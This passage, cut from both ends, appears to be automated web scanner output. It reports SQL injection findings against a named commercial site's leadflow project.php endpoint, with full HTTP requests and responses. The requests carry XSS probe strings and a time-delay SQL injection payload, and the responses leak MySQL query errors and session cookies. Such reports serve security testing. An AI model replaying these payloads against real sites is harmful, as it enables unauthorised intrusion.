OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:51:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n5s6dge9nsp767p71tv4fgo726; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/leadflow/inco00/project.php was not found on this server.</p>

1.429. http://www.insideup.com/ppc/leadflow/inco00/leadflow/inco00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/leadflow/inco00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?catId=' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:50:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7tgqqo3n5epjss11chmmmrokl2; path=/
Content-Length: 2214
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId='' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/inco00/leadflow/inco00/project.php?catId='/'
   union select prj.catId,pr' at line 5

Request 2

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?catId='' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:51:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=omhclr52qiou8thrc28qtuagv3; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/leadflow/inco00/project.php was not found on this server.</p>

1.430. http://www.insideup.com/ppc/leadflow/inco00/leadflow/inco00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/leadflow/inco00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc=' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001158)%3C/script%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pe9vrtpbbmgrno2eua5h4e4gj3; path=/
Content-Length: 2310
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
j.groupId    
    where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='/'
   union select ' at line 5

Request 2

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?catId=60003&iusrc='' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001158)%3C/script%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 